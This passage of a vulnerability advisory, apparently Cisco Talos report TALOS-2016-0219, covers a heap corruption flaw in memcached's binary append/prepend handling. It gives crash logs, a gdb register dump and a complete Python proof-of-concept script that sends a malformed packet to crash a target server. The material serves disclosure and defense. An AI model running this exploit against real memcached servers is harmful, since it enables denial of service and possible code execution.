(memcached.c:4656)\n ==466== by 0x40686B5: event_base_loop (in /usr/lib/libevent-2.0.so.5.1.9)\n ==466== by 0x805B1B8: worker_libevent (thread.c:380)\n ==466== by 0x40CB312: start_thread (pthread_create.c:310)\n ==466== by 0x41DAF2D: clone (clone.S:122)\n ==466== Address 0xafba654 is not stack'd, malloc'd or (recently) free'd\n \n\nA complete server crash can be achieved by simply corrupting an existing item and then trying to retrieve it as demonstrated by the attached proof of concept. In that case, the process crashes in the following manner:\n \n \n <30 new auto-negotiating client connection\n 30: going from conn_new_cmd to conn_waiting\n 30: going from conn_waiting to conn_read\n 30: going from conn_read to conn_parse_cmd\n 30: Client using the ascii protocol\n <30 set testkey 0 60 4\n 30: going from conn_parse_cmd to conn_nread\n > NOT FOUND testkey\n >30 STORED\n 30: going from conn_nread to conn_write\n 30: going from conn_write to conn_new_cmd\n 30: going from conn_new_cmd to conn_waiting\n 30: going from conn_waiting to conn_read\n 30: going from conn_read to conn_closing\n <30 connection closed.\n <30 new auto-negotiating client connection\n 30: going from conn_new_cmd to conn_waiting\n 30: going from conn_waiting to conn_read\n 30: going from conn_read to conn_parse_cmd\n 30: Client using the binary protocol\n <30 Read binary protocol data:\n <30 0x80 0x1a 0x00 0xfa\n <30 0x00 0x00 0x00 0x00\n <30 0x00 0x00 0x00 0x00\n <30 0x00 0x00 0x00 0x00\n <30 0x00 0x00 0x00 0x00\n <30 0x00 0x00 0x00 0x00\n 30: going from conn_parse_cmd to conn_nread\n Value len is -250\n Invalid rlbytes to read: len -250\n 30: going from conn_nread to conn_closing\n <30 connection closed.\n <30 new auto-negotiating client connection\n 30: going from conn_new_cmd to conn_waiting\n 30: going from conn_waiting to conn_read\n 30: going from conn_read to conn_parse_cmd\n 30: Client using the ascii protocol\n <30 get testkey\n \n Program received signal SIGSEGV, Segmentation fault.\n [Switching to Thread 0xb6d3db40 (LWP 530)]\n [----------------------------------registers-----------------------------------]\n EAX: 0x41 ('A')\n EBX: 0x8001ce00 --> 0x1ccf8\n ECX: 0x10\n EDX: 0xb7d40008 --> 0x0\n ESI: 0x41414141 ('AAAA')\n EDI: 0xb5423b04 (\"testkey\")\n EBP: 0x7\n ESP: 0xb6d3d060 --> 0x0\n EIP: 0x80011af7 (<assoc_find+103>:\tmovzx eax,BYTE PTR [esi+0x1d])\n EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)\n [-------------------------------------code-------------------------------------]\n 0x80011af0 <assoc_find+96>:\tmov esi,DWORD PTR [esi+0x8]\n 0x80011af3 <assoc_find+99>:\ttest esi,esi\n 0x80011af5 <assoc_find+101>:\tje 0x80011b22 <assoc_find+146>\n => 0x80011af7 <assoc_find+103>:\tmovzx eax,BYTE PTR [esi+0x1d]\n 0x80011afb <assoc_find+107>:\tcmp eax,ebp\n 0x80011afd <assoc_find+109>:\tjne 0x80011af0 <assoc_find+96>\n 0x80011aff <assoc_find+111>:\tmovzx eax,BYTE PTR [esi+0x1b]\n 0x80011b03 <assoc_find+115>:\tmov DWORD PTR [esp+0x8],ebp\n [------------------------------------stack-------------------------------------]\n 0000| 0xb6d3d060 --> 0x0\n 0004| 0xb6d3d064 --> 0x0\n 0008| 0xb6d3d068 --> 0x0\n 0012| 0xb6d3d06c --> 0x0\n 0016| 0xb6d3d070 --> 0x0\n 0020| 0xb6d3d074 --> 0x0\n 0024| 0xb6d3d078 --> 0x80011a99 (<assoc_find+9>:\tadd ebx,0xb367)\n 0028| 0xb6d3d07c --> 0x8001ce00 --> 0x1ccf8\n [------------------------------------------------------------------------------]\n Legend: code, data, rodata, value\n Stopped reason: SIGSEGV\n 0x80011af7 in assoc_find ()\n gdb-peda$\n \n\n### Exploit Proof-of-Concept (optional)\n \n \n import struct\n import socket\n import sys\n \n MEMCACHED_REQUEST_MAGIC = \"\\x80\"\n OPCODE_PREPEND_Q = \"\\x1a\"\n key_len = struct.pack(\"!H\",0xfa)\n extra_len = \"\\x00\"\n data_type = \"\\x00\"\n vbucket = \"\\x00\\x00\"\n body_len = struct.pack(\"!I\",0)\n opaque = struct.pack(\"!I\",0)\n CAS = struct.pack(\"!Q\",0)\n body = \"A\"*1024\n \n if len(sys.argv) != 3:\n print \"./poc_crash.py <server> <port>\"\n \n packet = MEMCACHED_REQUEST_MAGIC + OPCODE_PREPEND_Q + key_len + extra_len\n packet += data_type + vbucket + body_len + opaque + CAS\n packet += body\n \n set_packet = \"set testkey 0 60 4\\r\\ntest\\r\\n\"\n get_packet = \"get testkey\\r\\n\"\n \n s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s1.connect((sys.argv[1],int(sys.argv[2])))\n s1.sendall(set_packet)\n print s1.recv(1024)\n s1.close()\n \n \n s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s2.connect((sys.argv[1],int(sys.argv[2])))\n s2.sendall(packet)\n print s2.recv(1024)\n s2.close()\n \n s3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s3.connect((sys.argv[1],int(sys.argv[2])))\n s3.sendall(get_packet)\n s3.recv(1024)\n s3.close()\n \n\n### Timeline\n\n2016-10\u201410 - Vendor Disclosure \n2016-10-12 - Patch Fixed \n2016-10-31 - Public Release\n\n##### Credit\n\nDiscovered by Aleksandar Nikolic of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2016-0260\n\nPrevious Report\n\nTALOS-2016-0220\n", "edition": 12, "modified": "2016-10-31T00:00:00", "published": "2016-10-31T00:00:00", "id": "TALOS-2016-0219", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2016-0219", "title": "Memcached Server Append/Prepend Remote Code Execution Vulnerability", "type": "talos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
